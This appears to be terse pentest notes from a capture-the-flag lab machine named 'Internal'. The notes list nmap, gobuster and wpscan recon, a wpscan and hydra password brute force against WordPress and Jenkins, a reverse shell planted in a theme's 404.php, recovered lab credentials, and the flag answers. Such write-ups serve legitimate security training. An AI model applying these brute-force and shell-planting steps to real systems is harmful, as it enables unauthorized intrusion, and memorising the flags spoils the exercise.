- Machine: Internal
- Url: http://internal.thm
- IP Address: 10.10.169.15
- Scope of work:
  - find user.txt (gain sys shell) & root.txt (privesc)
  - report any/all vulnerabilities found doing so
find step-by-step pentest notes here
- Nmap scan [results]
  - cmd: nmap -sC -sV -A -o nmap.log internal.thm
- Gobuster scan [results]: main ip/domain
  - cmd: gobuster dir -u http://internal.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_0.log
- Gobuster scan [results]: blog site
  - cmd: gobuster dir -u http://internal.thm/blog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_1.log
- WPScan [results]
  - cmd: wpscan --url http://internal.thm/blog/ -e vp,vt,tt,cb,dbe,u,m -o wpscan.log
- WPScan [results]: user login brute force
  - cmd: wpscan --url http://internal.thm/blog/ -P /usr/share/wordlists/rockyou.txt -o wpscan_user_bf.log
- Login found for wordpress admin:
  - username: admin
  - password: my2boys
- Got reverse shell (http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php)
- Got user credentials:
  - username: aubreanna
  - password: bubb13guM!@#123
- Got user.txt flag: THM{int3rna1_fl4g_1}
- Got Jenkins logins by brute force:
  - username: admin
  - password: spongebob
  - cmd: hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form -s 9999 "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
- Got root.txt flag: THM{d0ck3r_d3str0y3r}